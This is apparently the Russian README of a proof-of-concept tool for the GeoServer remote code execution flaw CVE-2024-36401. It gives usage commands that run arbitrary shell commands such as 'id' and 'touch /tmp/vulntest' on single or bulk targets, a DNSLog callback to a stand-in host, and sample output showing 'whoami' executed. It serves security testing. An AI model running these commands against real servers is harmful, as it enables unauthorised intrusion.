
Этот скрипт является инструментом обнаружения PoC (Proof of Concept), разработанным для уязвимости удаленного выполнения кода в GeoServer (CVE-2024-36401). Данная уязвимость позволяет злоумышленнику выполнять произвольные команды на целевом сервере путем создания специальных запросов.
⚠️ Отказ от ответственности: Этот инструмент предназначен исключительно для исследований в области безопасности и легитимного тестирования с разрешения. Не используйте его в незаконных целях. Пользователь несет полную юридическую ответственность.
Данный скрипт предназначен для обнаружения уязвимости удаленного выполнения кода (CVE-2024-36401) в GeoServer с помощью PoC-инструмента. Уязвимость позволяет злоумышленнику выполнить произвольные команды на целевом сервере, отправив специально сформированный запрос.
Убедитесь, что в вашем окружении установлены следующие зависимости:
requestslxmlУстановить необходимые зависимости можно командой:
pip install requests lxml
python poc.py -u http://target.com -d dnslog.example.com
Или с указанием команды для выполнения:
python poc.py -u http://target.com -c "touch /tmp/vulntest"
Подготовьте текстовый файл с URL-адресами целей (по одному на строку):
python poc.py -uf targets.txt -d dnslog.example.com
Или с указанием команды:
python poc.py -uf targets.txt -c "id"
Подробная инструкция по использованию: Подробная документация по использованию
| Параметр | Описание |
|---|---|
-u, --url | Указывает адрес одиночной цели |
-uf, --url-file | Указывает путь к файлу, содержащему несколько URL-адресов целей |
-d, --dnslog | Указывает адрес DNSLog |
-c, --command | Указывает команду для выполнения на целевой системе (например: whoami, id, curl) |
⚠️ Примечание: параметры
-dи-cне могут использоваться одновременно.
[INFO] Получено 3 действующих Typenames, начинаем поиск уязвимости
[INFO] Цель: http://example.com
[INFO] Выполняемая команда: whoami
[INFO] DNSLOG адрес:
[INFO] Пробуем typeName: topp:states -> whoami
[+] Команда, вероятно, успешно выполнена! Цель: http://example.com Команда: whoami
-c./geoserver/wfs.Приветствуются любые Issue или Pull Request для улучшения этого проекта.
Данный проект распространяется под лицензией MIT. Вы можете свободно изменять, распространять и использовать в коммерческих целях, но обязаны сохранять уведомление об авторских правах.